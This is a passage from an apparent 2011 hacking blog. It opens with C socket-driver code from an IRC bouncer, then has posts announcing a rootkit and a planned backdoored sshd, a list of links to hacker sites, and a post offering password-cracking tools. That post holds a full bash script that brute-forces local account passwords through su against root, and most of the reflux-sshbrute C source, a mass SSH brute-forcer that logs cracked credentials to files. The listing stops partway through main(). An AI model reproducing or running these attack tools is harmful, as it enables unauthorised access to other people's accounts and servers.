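#ifdef BLOCKDNS
       /* blocking reverse lookup, abandoned by gotalarm() after 10 seconds */
       signal(SIGALRM,gotalarm);
       if(setjmp(alarmret)==0x0)
       {
           alarm(10);
           hostinfo = gethostbyaddr( ( char * )&addr.sin_addr.s_addr, sizeof( struct in_addr), AF_INET);
           signal(SIGALRM,SIG_IGN);
           alarm(0);
       } else
           hostinfo=NULL;
       signal(SIGALRM,SIG_IGN);
       if (hostinfo)
          strmncpy(accepthost,hostinfo->h_name,sizeof(accepthost));
       else
#endif
          strmncpy(accepthost,inet_ntoa( addr.sin_addr ),sizeof(accepthost));
       strmncpy(acceptip,inet_ntoa(addr.sin_addr),sizeof(acceptip));
       acceptport=ntohs(addr.sin_port);
   }
   return nsock;
}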

/*
 * Listener event: accept the pending connection on `currentsocket` with
 * p_accept(), re-arm the listener (flag=SOC_SYN) and queue a reverse lookup
 * of the peer whose completion runs acceptresolved().  Always returns -1 so
 * the driver does not raise the "created" event itself.
 * NOTE(review): currentsocket is dereferenced before mastersocket (a copy of
 * it) is checked for NULL, so the else branch below can never run.
 * NOTE(review): the #ifndef BLOCKDNS opened below is closed inside
 * acceptresolved(); with BLOCKDNS defined this function continues there.
 */
int socket_accept() {
    int ret,rc;
    int asocket;
    int npeer;
    int issl=0;
    int listensocket;
    int p_proto;
#ifndef BLOCKDNS
    char data[20]; /* "asocket\nmsock"; ap_snprintf bounds it, two large fds would be truncated */
    char *pt;
#endif
#ifdef HAVE_SSL
    int sslerr;
    char sebuf[1000];
#endif
    p_proto=currentsocket->sock->protocol;
    listensocket=currentsocket->sock->syssock;
    asocket = p_accept(listensocket);
    if(asocket<=0) return -1;
    mastersocket=currentsocket;
    if(mastersocket!=NULL) {
mastersocket->sock->flag=SOC_SYN; /* resetting the listener to listen again */
#ifdef HAVE_SSL
issl=mastersocket->sock->ssl; /* inherit ssl flag */
#endif
    } else {
//p_log(LOG_ERROR,-1,lngtxt(812));
shutdown(asocket,2);
close(asocket);
return -1;
    }
#ifndef BLOCKDNS
    /* data is a stack buffer; dns_lookup*() presumably copies it - confirm */
    ap_snprintf(data,sizeof(data),"%d\n%d",asocket,mastersocket->sock->syssock);
#ifdef IPV6
    if(mastersocket->sock->protocol==AF_INET6)
dns_lookupv6(acip6,acceptresolved,acceptresolved,data);
    else
#endif
dns_lookup(acip,acceptresolved,acceptresolved,data);
    return -1; /* dont trigger the created event */
}

/*
 * Second half of accepting a connection: the resolver callback for the peer
 * address queued by socket_accept() (with BLOCKDNS the #ifndef opened there
 * ends below and this code runs inline).  Checks the peer against the allow
 * list, registers the accepted descriptor with createsocket(), moves the
 * listener's SSL object onto it and runs the accept handshake, copies
 * addresses/ports/param from the listener, then calls the listener's
 * `constructed` hook.  Returns 0 on success, -1 when the peer is refused or
 * anything fails.
 */
int acceptresolved(struct resolve *rp) {
    int msock;
    int asocket;
    int rc;
    int *pr;
    int p_proto;
    int issl;
    struct in_addr inaddr;
    char *pt;
    char sebuf[1000];
    pt=strchr(rp->data,'\n'); /* "asocket\nmsock" from socket_accept() */
    if(pt)
    {
*pt=0;
pt++;
asocket=atoi(rp->data);
msock=atoi(pt);
    } else {
return -1;
    }
    inaddr.s_addr=rp->ip;
    strmncpy(accepthost,rp->hostn,sizeof(accepthost)); /* reverse name: chosen by the peer's DNS operator */
#ifdef IPV6
    if(rp->protocol==AF_INET6)
    {
inet_ntop(AF_INET6,&rp->ip6[0],acceptip,sizeof(acceptip));
    } else
#endif
strmncpy(acceptip,inet_ntoa(inaddr),sizeof(acceptip));
    mastersocket=getpsocketbysock(msock);
    if(mastersocket)
    {
#ifdef HAVE_SSL
issl=mastersocket->sock->ssl; /* inherit ssl flag */
#endif
p_proto=rp->protocol;
    }
    /* NOTE(review): when mastersocket is NULL, issl/p_proto stay uninitialised
       and mastersocket is dereferenced below */
#endif
    /* NOTE(review): a match on accepthost alone admits a peer whose reverse
       DNS claims an allowed name; only acceptip is authoritative */
    if(checkhostallows(acceptip)==-1 && checkhostallows(accepthost)==-1)
    {
//p_log(LOG_ERROR,-1,lngtxt(813),accepthost);
#ifdef HAVE_SSL
 if(mastersocket->sock->sslfd!=NULL && issl==SSL_ON)
 {
 SSL_shutdown(mastersocket->sock->sslfd);
 SSL_free(mastersocket->sock->sslfd);
 mastersocket->sock->sslfd=NULL;
 }
#endif
shutdown(asocket,2);
close(asocket);
return -1;
    }
    //p_log(LOG_WARNING,-1,lngtxt(814),accepthost);
    /* NOTE(review): createlistener() treats 0 as createsocket() failure; here -1 is tested - confirm */
    asocket=createsocket(asocket,ST_LISTEN,0,SGR_NONE,NULL,NULL,mastersocket->sock->errorhandler,mastersocket->sock->handler,mastersocket->sock->destructor,mastersocket->sock->remapper,p_proto,issl);
    if (asocket==-1) return -1;
    currentsocket=getpsocketbysock(asocket);
#ifdef HAVE_SSL
    if(currentsocket!=NULL && mastersocket!=NULL) /* inherit ssl-setup */
    {
currentsocket->sock->ssl=mastersocket->sock->ssl;
currentsocket->sock->sslfd=mastersocket->sock->sslfd;
mastersocket->sock->sslfd=NULL; /* the listener gives its SSL object away */
if(currentsocket->sock->ssl==SSL_ON && currentsocket->sock->sslfd!=NULL)
{
    SSL_set_fd(currentsocket->sock->sslfd,asocket);
    SSL_set_accept_state(currentsocket->sock->sslfd);
    rc=SSL_accept(currentsocket->sock->sslfd);
    if(rc==-1)
    {
rc=SSL_get_error(currentsocket->sock->sslfd,rc);
switch(rc)
{
    case SSL_ERROR_NONE:
break;
    case SSL_ERROR_WANT_WRITE:
    case SSL_ERROR_WANT_READ:
    case SSL_ERROR_WANT_X509_LOOKUP:
break;
    default:
/* NOTE(review): ERR_error_string() expects an ERR_get_error() code, not the SSL_get_error() value in rc */
ERR_error_string(rc,sebuf);
//p_log(LOG_ERROR,-1,lngtxt(815),accepthost,sebuf);
killsocket(asocket);
return -1;
}
    }
    //p_log(LOG_INFO,-1,lngtxt(816),accepthost);
}
    }
#endif
    strmncpy(currentsocket->sock->source,acceptip,sizeof(currentsocket->sock->source));
    strmncpy(currentsocket->sock->dest,mastersocket->sock->source,sizeof(currentsocket->sock->dest));
    currentsocket->sock->param=mastersocket->sock->param;
    currentsocket->sock->sport=acceptport;
    currentsocket->sock->dport=mastersocket->sock->sport;
    currentsocket->sock->flag=SOC_CONN;
#ifndef BLOCKDNS
    if(mastersocket->sock->constructed!=NULL)
    {
writesock_DELAY(currentsocket->sock->syssock,"",5); /* empty delayed entry; purpose not visible here */
rc=(*mastersocket->sock->constructed)(mastersocket->sock->param);
    }
#endif
    return 0x0;
}
/* helper routine for checking sockets state without delay. needed for garbage collection.
   Input:  System socket #
   Output: 1 = data waiting
   0 = no data waiting
  <0 = socket error
   */
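/*
 * Poll `syssock` for readable data without waiting (select with a zero
 * timeout).  Returns select()'s result: 1 = data waiting, 0 = nothing
 * waiting, <0 = error.  Unknown sockets return 0.
 * Fix: descriptors outside 0..FD_SETSIZE-1 cannot be placed in an fd_set
 * (FD_SET would write out of bounds); they now return -1 so the caller's
 * garbage collection treats them as errors instead of corrupting memory.
 */
int socketdatawaiting(int syssock) {
    fd_set rfds;
    struct timeval tv;
    if(getpsocketbysock(syssock)==NULL) return 0x0;
    if(syssock<0 || syssock>=FD_SETSIZE) return -1;
    tv.tv_usec = 0;
    tv.tv_sec = 0; /* return without any delay, dont _wait_ for data */
    FD_ZERO(&rfds);
    FD_SET(syssock,&rfds);
    return select(syssock+1,&rfds,NULL,NULL,&tv);
}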

/* central socketdriver event routine */
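/*
 * Central socketdriver event routine: one pass of the event loop over the
 * global socket list (socketnode).
 *
 * Pass 1 walks the list, ages the per-socket delay counters by one tick when
 * the wall-clock second has changed since the previous call (delayinc), runs
 * the constructor of sockets still in SOC_NOUSE, and collects the read/write
 * descriptors of SOC_SYN / SOC_CONN sockets into rfds/wfds.
 * Pass 2 select()s on them for at most one second and then, from the highest
 * descriptor down, completes pending connects/accepts (SOC_SYN), dispatches
 * reads and send-queue flushes (SOC_CONN), and fires the error handler on
 * refused or timed-out connects.  Processing stops at the first error that
 * kills a socket (goterr) so the list is walked afresh on the next call.
 *
 * Returns 0 when there was nothing to select on (after sleeping one second),
 * otherwise the number of whole seconds the select() call spanned.
 *
 * Relies on the file-scope state socketnode, currentsocket, oldsec and
 * delayinc, and on the helpers getpsocketbysock(), getpsocketbygroup(),
 * socketdatawaiting(), killsocket(), receivesock(), flushsendq(),
 * socket_connect(), socket_accept(), writesock_DELAY(), writesock_URGENT()
 * and (unless BLOCKDNS) dns_check_expires().
 *
 * Fix: the getsockopt() failure branch used to contain the no-op comparison
 * `optbuf==-1;`, which left optbuf unset and the following optbuf!=0 test
 * reading an indeterminate value; it is now an assignment.  opt is declared
 * as socklen_t to match getsockopt()'s length argument.
 */
unsigned long socketdriver() {
    fd_set rfds;
    fd_set wfds;
    struct socketnodes *th,*par;
    int rc,altsock;
    int goterr=0;            /* set once a socket was killed in pass 2 */
    int fdscnt=0,wfdscnt=0;  /* descriptors added to rfds / wfds */
    int sockit=0,sockat=9999,noadv,ln; /* sockit: highest fd, sockat: lowest fd */
    socklen_t opt;
    int optbuf;              /* SO_ERROR value; non-zero means the connect failed */
    int sck,ssck;
#ifdef HAVE_SSL
    SSL_CIPHER *c;
    int bits;
    int ssl_fd;
#endif
    static struct timeval tv;
    static unsigned long dnl;  /* second of the last dns_check_expires() run */
    static int nodelays=0;     /* consecutive calls within the same second */
    struct sendqt *msq;
    int toutw;
    int nowf=0;                /* read from the socket but never used here */
    time_t tm,em;
    delayinc=0;
    time(&tm);
    if (tm!=oldsec)
    {
        /* A new second: every counter below ages by one tick. */
        delayinc=1;
        nodelays=0;
    }
    else
        nodelays++; /* disallow process to blast up */
    oldsec=tm;
    th=socketnode;
    par=th;
    FD_ZERO( &rfds);
    FD_ZERO( &wfds);
    /* Pass 1: construct new sockets and build the select() sets. */
    while(th!=NULL)
    {
        rc=0;noadv=0;
        if(th->sock!=NULL)
        {
            if(th->sock->serversocket)
            {
                /* A stoned server socket is throttled until the counter expires. */
                if(th->sock->serverstoned>0)
                {
                    th->sock->serverstoned-=delayinc;
                    if(th->sock->serverstoned==0) th->sock->serverbytes=0;
                }
            }
            if (th->sock->syssock>sockit) sockit=th->sock->syssock;
            if (th->sock->syssock<sockat) sockat=th->sock->syssock;
            if (th->sock->flag==SOC_NOUSE)
            {
                currentsocket=th;
                altsock=th->sock->syssock;
                if(th->sock->constructor!=NULL)
                    rc=(*th->sock->constructor)(th->sock->param);
                /* The constructor may have replaced the node; re-read it from
                 * the predecessor and only advance to SOC_SYN if the descriptor
                 * is still the one we started with. */
                th=par->next;
                if(th!=NULL)
                {
                    if(altsock==th->sock->syssock)
                        th->sock->flag=SOC_SYN;
                    else
                        noadv=1;
                } else
                    noadv=1;
            } else {
                /* Parenthesised to spell out the precedence the original relied on. */
                if (th->sock->flag==SOC_SYN || (th->sock->flag==SOC_CONN && th->sock->syssock>0))
                {
#ifdef HAVE_SSL
                    if(th->sock->ssl==SSL_ON && th->sock->sslfd!=NULL)
                    {
                        ssl_fd=SSL_get_fd(th->sock->sslfd);
                        if(ssl_fd>0)
                        {
                            if(ssl_fd<sockat) sockat=ssl_fd;
                            if(ssl_fd>sockit) sockit=ssl_fd;
                            FD_SET(ssl_fd,&rfds);
                        }
                    } else
#endif
                    if(th->sock->syssock>0)
                        FD_SET(th->sock->syssock, &rfds);
                    fdscnt++;
                    toutw=0;
                    msq=th->sock->sendq;
                    if(msq)
                    {
                        /* Head of the send queue is still delayed: age it, don't poll for write. */
                        if(msq->delay>0)
                        {
                            toutw=-1;
                            msq->delay-=delayinc;
                        }
                    }
                    if(toutw==0 && (th->sock->flag==SOC_SYN || (th->sock->sendq!=NULL && th->sock->serverstoned==0)))
                    {
#ifdef HAVE_SSL
                        if(th->sock->ssl==SSL_ON && th->sock->sslfd!=NULL)
                        {
                            ssl_fd=SSL_get_fd(th->sock->sslfd);
                            if(ssl_fd>0)
                            {
                                if(ssl_fd<sockat) sockat=ssl_fd;
                                if(ssl_fd>sockit) sockit=ssl_fd;
                                FD_SET(ssl_fd,&wfds);
                            }
                        } else
#endif
                        if(th->sock->syssock>0)
                            FD_SET(th->sock->syssock, &wfds);
                        wfdscnt++;
                    }
                }
            }
        }
        if(noadv==0)
        {
            par=th;
            th=th->next;
        }
    }
    if(sockat>sockit) sockat=sockit;
    if (fdscnt==0)
    {
        /* Nothing to wait for: idle for a second instead of spinning. */
        sleep(1);
        return 0x0;
    }
    if(nodelays>20)
    {
        usleep(10);
        nodelays=0;
    }
    tv.tv_usec = 0;
    tv.tv_sec = 1;
    if(wfdscnt>0)
        ln=select(sockit +1, &rfds, &wfds,NULL,&tv);
    else
        ln=select(sockit +1, &rfds, NULL,NULL,&tv);
    time(&em);
    if(ln<=0) {
#ifndef BLOCKDNS
        /* dnl is unsigned, so dnl-time(NULL) wraps to a large value whenever the
         * second has changed; the test therefore fires once per new second. */
        if(dnl==0 || dnl-time(NULL)>=1)
        {
            dns_check_expires();
            dnl=time(NULL);
        }
#endif
        if(ln<0) /* ouch, socket-error. check every single socket, do a garbage collection */
        {
            for(sck=sockit;sck>=sockat;sck--)
            {
                if(socketdatawaiting(sck)<0)
                {
                    killsocket(sck);
                }
            }
        }
        return em-tm;
    }
    /* Pass 2: service every descriptor from the highest down.  Note that par
     * is not advanced in this loop, so par->next below is always the second
     * node of the list. */
    th=socketnode;
    par=th;
    if(sockit<=0) sockit=1;
    for(sck=sockit;sck>=sockat;sck--)
    {
        noadv=0;
        ssck=sck;
        th=getpsocketbysock(sck);
        if(th!=NULL)
        {
            currentsocket=th;
#ifdef HAVE_SSL
            if(th->sock->ssl==SSL_ON && th->sock->sslfd!=NULL)
                ssck=SSL_get_fd(th->sock->sslfd);
            if(ssck<=0) ssck=sck;
#endif
            altsock=ssck;
            nowf=th->sock->nowfds;
            if(th->sock->flag==SOC_SYN && ssck>0)
            {
                if(FD_ISSET(ssck,&rfds) || FD_ISSET(ssck,&wfds))
                {
                    /* Pending connect/accept became ready: SO_ERROR tells us whether it succeeded. */
                    opt=sizeof(optbuf);
                    if (getsockopt(ssck, SOL_SOCKET, SO_ERROR, &optbuf,&opt) >=0)
                    {
                        if(optbuf==0)
                        {
                            altsock=th->sock->syssock;
#ifdef HAVE_SSL
                            if(th->sock->ssl==SSL_ON)
                            {
                                if(th->sock->type==ST_CONNECT)
                                    th->sock->sslfd=SSL_new(clnctx);
                                else
                                    th->sock->sslfd=SSL_new(srvctx);
                                if(th->sock->sslfd==0)
                                {
                                    /* No SSL object: treat exactly like a refused connect
                                     * (the original had a disabled p_log() call here). */
                                    optbuf=-1;
                                }
                            }
#endif
                            if(optbuf==0)
                            {
                                if(th->sock->type==ST_CONNECT)
                                    rc=socket_connect();
                                else
                                    rc=socket_accept();
                                if(rc==0)
                                {
                                    if(th->sock->type==ST_CONNECT)
                                        th->sock->flag=SOC_CONN;
                                    th->sock->delay=300;
                                    if(th->sock->constructed!=NULL)
                                    {
                                        pcontext;
                                        writesock_DELAY(th->sock->syssock,"",5);
                                        rc=(*th->sock->constructed)(th->sock->param);
                                        pcontext;
                                    }
                                }
                            }
                        }
                    } else {
                        /* getsockopt() itself failed: take the error path below. */
                        optbuf=-1;
                    }
                    if(optbuf!=0) {
                        th=getpsocketbysock(altsock);
                        if(th!=NULL)
                        {
                            if(th->sock->errorhandler!=NULL)
                            {
                                /* Grouped sockets only report once the whole group has failed. */
                                if(th->sock->sockgroup==0 || (th->sock->sockgroup>0 && getpsocketbygroup(socketnode,th->sock->sockgroup,th->sock->syssock)==NULL))
                                {
                                    pcontext;
                                    rc=(*th->sock->errorhandler)(th->sock->param,SERR_REFUSED);
                                    pcontext;
                                }
                            }
                            goterr=1;
                            if(getpsocketbysock(altsock)!=NULL)
                            {
                                killsocket(th->sock->syssock);
                            }
                        }
                    }
                } else {
                    /* Not ready yet: age the connect timer of outgoing connects. */
                    if(th->sock->flag==SOC_SYN && th->sock->type==ST_CONNECT)
                    {
                        th->sock->delay+=delayinc;
                        if(th->sock->delay>SOC_TIMEOUT)
                        {
                            altsock=th->sock->syssock;
                            if(th->sock->errorhandler!=NULL)
                            {
                                pcontext;
                                rc=(*th->sock->errorhandler)(th->sock->param,SERR_TIMEOUT);
                                pcontext;
                            }
                            goterr=1;
                            if(getpsocketbysock(altsock)!=NULL)
                            {
                                killsocket(th->sock->syssock);
                            }
                        }
                    }
                }
            } else
            if (th->sock->flag==SOC_CONN) {
                noadv=0;
                if(FD_ISSET(ssck,&rfds))
                {
                    if (th->sock->flag==SOC_CONN)
                    {
                        altsock=th->sock->syssock;
                        rc=receivesock(th->sock);
                        th=par->next;
                        /* receivesock() may have removed the socket; a vanished
                         * socket or a non-positive read result kills it. */
                        if (getpsocketbysock(altsock)==NULL) rc=-1;
                        if (rc<=0)
                        {
                            killsocket(altsock);
                            noadv=1;
                        }
                    }
                } else {
                    /* Idle non-stream client connection: send a keepalive CRLF when the timer runs out. */
                    if(th->sock->flag==SOC_CONN && th->sock->type==ST_CONNECT && th->sock->dataflow!=SD_STREAM) {
                        th->sock->delay-=delayinc;
                        if(th->sock->delay<=0) {
                            writesock_URGENT(th->sock->syssock,"\r\n");
                            th->sock->delay=300;
                        }
                    }
                }
                if(FD_ISSET(ssck,&wfds) && noadv==0 && th->sock->serverstoned==0) {
#ifdef HAVE_SSL
                    if(th->sock->ssl==SSL_OFF)
                        flushsendq(sck,Q_NEXT);
                    else
                        if(th->sock->ssl==SSL_ON && th->sock->sslfd!=NULL) {
                            /* Only flush once the TLS handshake has negotiated a cipher. */
                            c=SSL_get_current_cipher(th->sock->sslfd);
                            SSL_CIPHER_get_bits(c,&bits);
                            if(bits!=0)
                                flushsendq(sck,Q_NEXT);
                        }
#else
                    flushsendq(sck,Q_NEXT);
#endif
                }
            }
        }
        if (goterr==1) break;
    }
#ifndef BLOCKDNS
    if(dnl==0 || dnl-time(NULL)>=1)
    {
        dns_check_expires();
        dnl=time(NULL);
    }
#endif
    return em-tm;
}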

My first root (src)

Posted on 25th September 2011 in Codes, Exploits

Ooops! I mean rootkit… registered users may proceed…

Great Websites I like to use

Posted on 24th September 2011 in Papers

I'd like to mention a few of my friends' websites, and those who have helped me — well, most of the guys I speak to regularly — so I should note this to others: please do look at these other sites and enjoy their wisdom!

pi3 of www.pi3.com.pl // Master r.kit

noptrix of www.noptrix.net // NOP tricks!

kcope of is0warez.de // Master of Remote exploitation!

K-Special/n0ah my good friend has no website atm but google his nick and there is NO shortage of mirrors, check n0ah.org from time to time ;)

iCER of magicShells.com // All round nice guy and runs a decent company to!

roy of Italian Security Team // good guy and fellow Italian!

Michael B. of rootkit.nl // Master of rootkit-removal

Zmeu of blackhats.pl // Master Scan

All the guys at www.backbox.org for their awesome project (ciao a tutti e’) !
All the guys in #Haxnet@Efnet for their continued support,

and anyone I have missed — well, nudge me, coz I have a terrible memory for sites especially!
Those sites I have used, and those people's work I also love to read and use if I have to.
Coming soon, complete Vihrogon-rootkit sshd src with diffs applied (almost done)!
xd / Team NoNet

Linux/BSD sshd bruter

Posted on 24th September 2011 in Uncategorized

Now for Michael's; note I made this for the root account, it wasn't configured for it.. great bruter code tho!

make a file.sh
Linux/Bsd bruter

#!/bin/bash
# (c) 1999/2000 <lcamtuf@ids.pl>
# ------------------------------
# Requirements:
# - working /bin/su
# - recent PAM implementation (tested with RedHat 5.x)
# - 'usleep' command and bash 1.14.x or 2.0.x
#
# What the script below does: for each line of WORDFILE it pipes the
# candidate into a backgrounded `su DESTACC`, waits KILLDELAY tenths of a
# second, then sends SIGKILL. A failed kill (su already exited) is taken
# as the signal that the candidate matched; reaching the end of the file
# means no match. The only runtime input is the optional account name in
# $1; WORDFILE and KILLDELAY are fixed in the setup section.
#
# NOTE(review): "NothingInLogs" is a claim in the banner, not something the
# script verifies. PAM-backed su implementations generally record failed
# authentications, so a burst of su failures for one account within one
# session is the detection signal for this activity -- confirm against the
# host's PAM configuration.
DESTACC='root'    # Account to crack
WORDFILE='words'  # Wordfile with passwords to test
KILLDELAY=03      # Delay (in 1/10 sec) to wait for su (<10)
                  # NOTE: bash arithmetic reads a leading 0 as octal; 03 is
                  # still 3, but 08 or 09 would be rejected.

# End of setup
clear
echo "RedHat - NothingInLogs[tm] BruteForce(R) Password Crack"
echo "-------------------------------------------------------"
echo "  - (c) 1999/2000, Michal Zalewski <lcamtuf@ids.pl> -  "
echo
# Optional first argument overrides the target account.
if [ ! "$1" = "" ]; then
  DESTACC="$1"
fi
# Tenths of a second -> microseconds for usleep.
KD=$[KILLDELAY*100000]
echo "[+] Configured against user '$DESTACC', wordfile: $WORDFILE"
echo "[+] Kill-delay set to $KD usecs."
# Preflight checks: account exists, shell is bash, wordfile present,
# /bin/su is setuid and executable, usleep available, not running as root.
id "$DESTACC" &>/dev/null
if [ ! "$?" = "0" ]; then
  echo "[-] User: '$DESTACC' not found."
  echo
  exit 0
fi
# Shell field (7th) of the account's /etc/passwd entry; anything other than
# /bin/bash only produces a warning.
SHL="`grep "^$DESTACC:" /etc/passwd|awk -F: '{print $7}'`"
if [ ! "$SHL" = "/bin/bash" ]; then
  echo "[-] User '$DESTACC' has $SHL set as shell, expect problems."
fi
echo "[+] Destination account is alive and well."
if [ ! -f "$WORDFILE" ]; then
  echo "[-] Wordfile '$WORDFILE' not found, check it."
  echo
  exit 0
fi
if [ ! -u /bin/su ]; then
  echo "[-] Can't find +s on /bin/su, 0wn me."
  echo
  exit 0
fi
if [ ! -x /bin/su ]; then
  echo "[-] Haven't +x on /bin/su, 0wn me."
  echo
  exit 0
fi
echo "[+] /bin/su seems to be executable and setuid, hopefully it works."
if [ ! -x /bin/usleep ]; then
  echo "[-] No /bin/usleep in this system. Be a hacker."
  echo
  exit 0
fi
if [ "$UID" = "0" ]; then
  echo "[-] Root?! your mental right?"
  echo
  exit 0
fi
echo "[+] Let's go straight to number one."
# Number of candidates. Each iteration below re-reads the file with
# head/tail to fetch line CNT, so the whole run is quadratic in LNS.
LNS="`cat $WORDFILE | wc -l|awk '{print $1}'`"
CNT=0
echo "[+] Wordfile '$WORDFILE' loaded - $LNS passes."
echo "[+] Estimated time: $[LNS*KILLDELAY/25] secs, max: $[LNS*KILLDELAY/10] secs."
while [ "$CNT" -lt "$LNS" ]; do
  CNT=$[CNT+1]
  PASS="`head -$CNT $WORDFILE|tail -1`"
  echo -ne "[?] Trying: '$PASS' ($CNT/$LNS).                \r"
  # Feed the candidate to su on stdin in a background pipeline; $! is the
  # PID of its last command (su).
  echo "$PASS" | su "$DESTACC" &>/dev/null &
  usleep $KD
  kill -9 $! &>/dev/null
  # kill failing means su had already exited before the delay elapsed; the
  # script interprets that as an accepted password.
  if [ ! "$?" = "0" ]; then
    echo
    echo "[*] Huh, I've tried pass: '$PASS' for: '$DESTACC'."
    echo "[+] Time wasted: $[KILLDELAY*CNT/10] secs."
    echo "[+] Thank You, and hope you enjoyed your stay."
    echo
    exit 0
  fi
done
echo "[*] Hmm, end of wordfile, but no matching passwords :( "
echo "[+] Time wasted: $[KILLDELAY*CNT/10] seconds."
echo "[+] Bad day, try again tomorrow?"
echo
exit 0

And finally for tal0n’s!
A great guy and good friend!

Note, this can use libssh v2 if you want to bother to make it ;) I have made that, even for Windows, and won't publish it, but it is VERY simple and worth it; you won't get more than routers with these, you really want to be using and compiling with libssh 0.2 or 2.0 (whatever it is) but not 0.1 as most do… I might one day publish the one I have, but it is basically just as I have said, and some people do have it: just use ssh2 functions to auth instead of ssh1, and connecting is also a bit different, but very easy, as it is a lot of defines you call in ssh2 rather than functions, like ssh1.
Anyhow, that's just some rhetoric crap I thought of.. have phun! (xd)

For Linux/BSD

/*
* =====================================================================================================|
* ______________________________________________________________________________________________________
* This WAS private until traders and lame zone-h forum people got ahold of it >:( .                    |
* _____________________________________________________________________________________________________|
*                                                                                                      |
* reflux-sshbrute.c                                                                                    |
*                                                                                                      |
* SSHBrute v1.4 - Tal0n [cyber_talon@hotmail.com] of [Reflux Security] on [09-04-04]                   |
* Based on sshbrute2.c, but much, much better =).                                                      |
*                                                                                                      |
* You MUST have LibSSH installed to compile: http://www.0xbadc0de.be/libssh/libssh-0.1.tgz             |
*                                                                                                      |
* Compiling: gcc -o sshbrute sshbrute.c -lssh                                                          |
* _____________________________________________________________________________________________________|
* Notes for v1.4:                                                                                      |
*                                                                                                      |
* 1) Changed the printing of the banner to a variable instead of text to make updating easier.         |
* 2) Added/Removed some login combinations but still keeping to limit to 50.                           |
* 3) Changed logging names and syntax of shells and no shells and no printing of boxes to the screen.  |
* 4) Added and changed syntax to view file its bruting and its PID when it starts and finishes.        |
* 5) Added a feature so that it fork()'s into the background while bruting.                            |
*                                                                                                      |
* _____________________________________________________________________________________________________|
* This WAS private until traders and lame zone-h forum people got ahold of it >:( .                    |
* _____________________________________________________________________________________________________|
* =====================================================================================================|
*/
#include <arpa/inet.h>
#include <libssh/libssh.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>

char banner[] = "\nSSHBrute v1.4 - Tal0n [cyber_talon@hotmail.com] of [Reflux Security] on 09-04-04"; // Printed by main() for the usage and -help output.
int i; // Global counter: checkauth() increments it and main() resets it to 0 in each child; nothing in this file reads it.

/*
 * Opens a session channel on an already-authenticated libssh session,
 * requests a pty (only when stdin is a tty) and a shell, then polls the
 * channel for up to ~5 seconds.
 *
 * Returns 0 when the remote side closes the channel, -1 when the channel is
 * still open after the timeout with nothing readable.  The caller
 * (checkauth) treats the non-zero case as "a shell stayed open".
 *
 * NOTE(review): readbuf from buffer_new() is never released, the channel is
 * never closed on either return path, and the result of
 * open_session_channel() is dereferenced without a NULL check.
 */
int shell(SSH_SESSION *session) // The shell and ssh session.
{
     struct timeval tv; // Declared but not used.
     BUFFER *readbuf = buffer_new(); // libssh buffer that channel_read() fills; its contents are discarded.
     int what; // Return value of the last libssh call.
     time_t start, acum; // start: when polling began; acum is not used.
     CHANNEL *channel; // Session channel handle.
     channel = open_session_channel(session, 1000, 1000); // Open a session channel on the session (window/packet size 1000).
     if(isatty(0)) // Only ask for a pty when our own stdin is a terminal.
     what = channel_request_pty(channel); // Request a pty.
     what = channel_request_shell(channel); // Request a shell =)
     start = time(0); // Start the timer =P
while(channel->open != 0) // Keep polling while the channel stays open.
{
     usleep(500000); // Poll every half second.
     what = channel_poll(channel, 0); // Bytes readable on the channel, if any.
if(what > 0) // Data arrived: drain it.
{
     what = channel_read(channel, readbuf, 0, 0); // Read into readbuf; nothing inspects the data.
}
else
{
if(start+5<time(0)) // Five second timeout (start+5), despite the original comment saying ten.
{
     return -1;
}
}
}
     return 0;
}

/*
 * Attempts one username/password against host over SSH and records the
 * outcome on disk.
 *
 * Flow: alarm(10) is armed, and no SIGALRM handler is installed anywhere in
 * this file, so a connect that hangs past 10 s ends the process with the
 * signal's default action.  A failed ssh_connect() returns silently; a
 * rejected password disconnects and returns; an accepted password is written
 * in clear text as "[user/pass host]" to "vuln.shell" (shell() returned
 * non-zero) or "vuln.noshell" in the current directory.  Neither fopen()
 * result is checked before fprintf(), and the session is not disconnected on
 * the accepted-password path.
 *
 * Forensics note: those two file names and the line format above are the
 * on-disk artefacts this tool leaves on the machine it was run from.
 */
void checkauth(char *username, char *password, char *host) // Check authentication.
{
     SSH_OPTIONS *options; // libssh connection options.
     SSH_SESSION *session; // libssh session handle.
     char *argv[] = {"none"}; // Dummy argv for ssh_getopt().
     int argc = 1; // Matching argc.
     i++; // Bump the global counter (never read).
     alarm(10); // 10 s watchdog; no handler, so the default action applies.
     options = ssh_getopt(&argc, argv); // Build options from the dummy argv.
     options_set_username(options, username); // Set username.
     options_set_host(options, host); // Set host
     session = ssh_connect(options); // Connect with the options specified.
if(!session) // No session: give up silently.
     return;
if(ssh_userauth_password(session, NULL, password) != AUTH_SUCCESS) // Password rejected.
{
     ssh_disconnect(session); // Disconnect the ssh session.
     return;
}
if(shell(session)) // shell() returned -1: the channel stayed open past its timeout.
{
     FILE *fd; // Log file handle (unchecked).
     fd = fopen("vuln.shell", "a+"); // Append to vuln.shell
     fprintf(fd, "[%s/%s %s]\n", username, password, host); // Write the credentials and host
     fclose(fd); // Close vuln.shell
}
else
{
     FILE *fd; // Log file handle (unchecked).
     fd = fopen("vuln.noshell", "a+"); // Append to vuln.noshell.
     fprintf(fd, "[%s/%s %s]\n", username, password, host); // Write the credentials and host.
     fclose(fd); // Close vuln.noshell.
}
}

/*
 * Entry point.  Modes, selected by argv[1]:
 *   -brute <file>  fork() once; the child reads the file line by line and,
 *                  for every line, forks again and calls checkauth() with a
 *                  single fixed credential pair and that line as the host.
 *                  The parent prints the PID and falls through to the end of
 *                  main().  After each fork the child-side loop calls
 *                  wait(NULL).
 *   -grab <ip>     connect to <ip>:22, send three CRLFs and print whatever
 *                  is read back as the banner.
 *   -help          print the banner and a usage text.
 *
 * NOTE(review): only argc < 2 is rejected, so "-brute" or "-grab" with no
 * second argument dereferences argv[2] == NULL.  In -grab the read() result
 * is ignored and a 200-byte reply fills the buffer without a terminator
 * before it is printed with %s.  printf/fopen/exit/atoi/getpid/wait/read/
 * close/fork are used without their headers being included above.
 */
int main(int argc, char *argv[]) // Main Function.
{
     char buffer[1000], *s; // One line of the hosts file, and a pointer to its newline.
     FILE *fd; // The hosts file.
     int maxfork, numfork; // Fork limit and running count (see notes above).
if(argc < 2) // No mode argument: print usage.
{
     printf("%s", banner); // Print this.
     printf("\nUsage: %s -brute <hosts.txt> || -grab <ip> || -help\n\n", argv[0]); // Print this.
     return 0;
}
if(strcmp(argv[1], "-brute") == 0) // If the user wants -brute...
{
fd = fopen(argv[2], "r"); // Open argv[2] (the hosts file) for reading.
if(fd == NULL) // If its not there...
{
